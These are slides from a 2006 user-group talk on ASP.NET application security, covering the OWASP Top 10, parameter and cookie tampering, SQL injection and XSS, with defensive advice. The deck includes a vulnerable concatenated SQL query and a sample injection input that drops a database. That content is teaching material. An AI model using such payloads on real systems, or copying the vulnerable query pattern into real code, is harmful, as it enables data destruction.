An Introduction to Application Security In ASP.NET Environments

Houston .NET User Group

February 23rd, 2006

1

Overview

• Background• What is Application Security and Why Is It Important?• Examples• ASP.NET Specific Examples• What is New in .NET 2.0?• Resources and Conclusions

2

Background

• Denim Group– Texas-based consultancy– Microsoft Gold Certified Partner– Custom software development– Systems integration– Application security

• Management Team Experience– Large-scale software development– Air Force information warfare– Client service for DoD, Big 4, Fortune 500

• Myself: Dan Cornell– Microsoft Certified Solution Developer– Java 2 Certified Programmer

3

What is Application Security and Why is it Important?• Application Security Defined• Fit with General Information Security Landscape• Why Does Application Security Matter

4

Application Security Defined

• Ensuring that custom application code performs as expected under the entire range of possible inputs

• Goals:– Confidentiality– Integrity– Availability

• Relationship to Software Quality Assurance– Really a sub-area of SQA– SQA typically verifies that software does what it is supposed to do– Application security is concerned that software does not do what it should

not do

5

Software Implementation – Perfect World

Intended Functionality

Actual Functionality

6

Software Implementation – Real WorldIntended Functionality

Actual Functionality

BugsBuilt

Features

UnintendedAnd UndocumentedFunctionality

7

Information Security

• Software Development: “Build” Culture– Features, functions and timelines

• Information Security: “Measure” Culture– Audit, assess and maintain

• Application security applies information security principles to custom software development efforts

• Many traditional information security practitioners are ill-equipped to mitigate application security issues

8

Why Does This Matter?

• Business-critical web applications are Internet-facing– An increasing number of assets are exposed

• Most applications have serious flaws– Foundstone (McAfee) and @Stake (Symantec) studies

• The regulator environment has changed– Sarbanes Oxley– GLB– California SB-1386

9

OWASP Top 10 Critical Web Application Security Vulnerabilities• Unvalidated Input• Broken Access Control• Broken Authentication and Authorization• Cross Site Scripting (XSS)• Buffer Overflows• Injection Flaws• Improper Error Handling• Insecure Storage• Denial of Service• Insecure Configuration Managementhttp://www.owasp.org/documentation/topten.html

10

Examples

• Hidden parameter tampering• Cookie manipulation• SQL injection

11

Hidden Parameter Tampering

• Price information is stored in hidden HTML form field • Assumption: hidden field won’t be edited• Attacker edits price parameter• Attacker submits altered web page with new “price”• Application trusts the price parameter from the user• Still widespread in many web stores

12

The Attack

13

The Result

14

Cookie Manipulation

• Browser cookie is used to store user identity information• Assumption: cookies are set by server side code, handled by

the browser automatically and not manipulated by users• Attacker alters cookie• Application trusts the browser cookie and allows attacker to

assume identity of another user

15

The Attack

16

The Attack

17

The Result

18

SQL Injection

• SQL statements are created from a combination of static text and user inputs

• Assumption: users will enter well-formed inputs• Attacker crafts a custom input to hijack control of the SQL

interpreter and execute arbitrary code• Very common flaw with tremendous security implications

19

The Attack

string username = Request[“username”];string password = Request[“password”];string sql = “SELECT * FROM User WHERE username =

‘” + username + “’ AND password = ‘” + password + “’”;

SqlCommand cmd = new SqlCommand(sql);IDataReader reader = cmd.ExecuteReader();

20

The Attack

• Specially crafted input contains SQL control characters

21

The Attack

• Malicious user sends in a username parameter of:Dcornell’; DROP DATABASE Ecommerce; --

SQL Executed is:SELECT * FROM User WHERE username = ‘Dcornell’;

DROP DATABASE Ecommerce; -- AND password = ‘whocares’

• Attacker can execute arbitrary database queries with the same permissions as the application

– View sensitive data– Modify data– Destroy data

22

ASP.NET Specific Examples

• Access Control– Authentication– Authorization

• Input Validation– ASP.NET validation– SQL injection– Cross Site Scripting (XSS)– Buffer Overflows

23

Access Control

• Authentication– HTTP Basic– Windows– Forms

• Available in ASP.NET 1.1• Much improved in ASP.NET 2.0 – lots of ready-made controls• See: http://www.sitepoint.com/article/asp-net-2-security

• Authorization– Control access to pages:

• NTFS: FileAuthorizationModule• web.config: UrlAuthorizationModule• See: http://msdn.microsoft.com/library/default.asp?url=/library/en-

us/cpguide/html/cpconaspnetauthorization.asp– Imperative security: Page.User.IsInRole(“roleName”)

24

Input Validation

• ASP.NET Validation• SQL Injection• Cross Site Scripting (XSS)• Buffer Overflows

25

ASP.NET Validation

• Perform both client-side and server-side validation• RequiredFieldValidator requires that a field be present

– Other validators will pass through blank inputs, so often you must use two validators

• Other examples of Validators include:– CompareValidator– RangeValidator– RegularExpressionValidator– CustomValidator

• Validators display error messages in-place• ValidationSummary object used to display a summary of all

errors from validators on a page

26

SQL Injection

• As seen before, this is the result of creating SQL queries by combining static text and unfiltered user inputs

• To prevent attacks, use proper escaping for potentially hostile inputs:

– Stored procedures (CommandType.StoredProcedure)– Parameterized queries– Be sure to actually escape malicious data

27

Cross Site Scripting (XSS)

• ASP.NET framework provides pretty good protection against some XSS attacks

– This is an example of blacklisting inputs rather than whitelisting inputs

• Underlying problem is a failure to properly escape special HTML characters

• Most ASP.NET controls provide this– Literals do not– Use a Label instead when possible– Or use HttpServerUtility.HtmlEncode method

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpref/html/frlrfSystemWebHttpServerUtilityClassHtmlEncodeTopic1.asp

28

Buffer Overflows

• Managed code should typically be fine– This can give a false sense of security

• Legacy COM components– Can still contain buffer overflows– “Seamless” .NET/COM integration makes these sneaky– Wrap potentially dangerous calls

29

What is New in .NET 2.0?

• Reference connection strings contained in machine.config• Encrypt sections of .config files with machine key• Easier access to DPAPI functions from .NET• Forms Authentication improvements (mentioned earlier)• SecureString class• More…

30

Resources

• OWASP www.owasp.org– Top 10– Guide– WebGoat training tool– WebScarab penetration testing tool (proxy)– Discussion lists

• MSDN msdn.microsoft.com/security

31

Questions

Dan Cornelldan@denimgroup.com

Denim Group, Ltd.www.denimgroup.com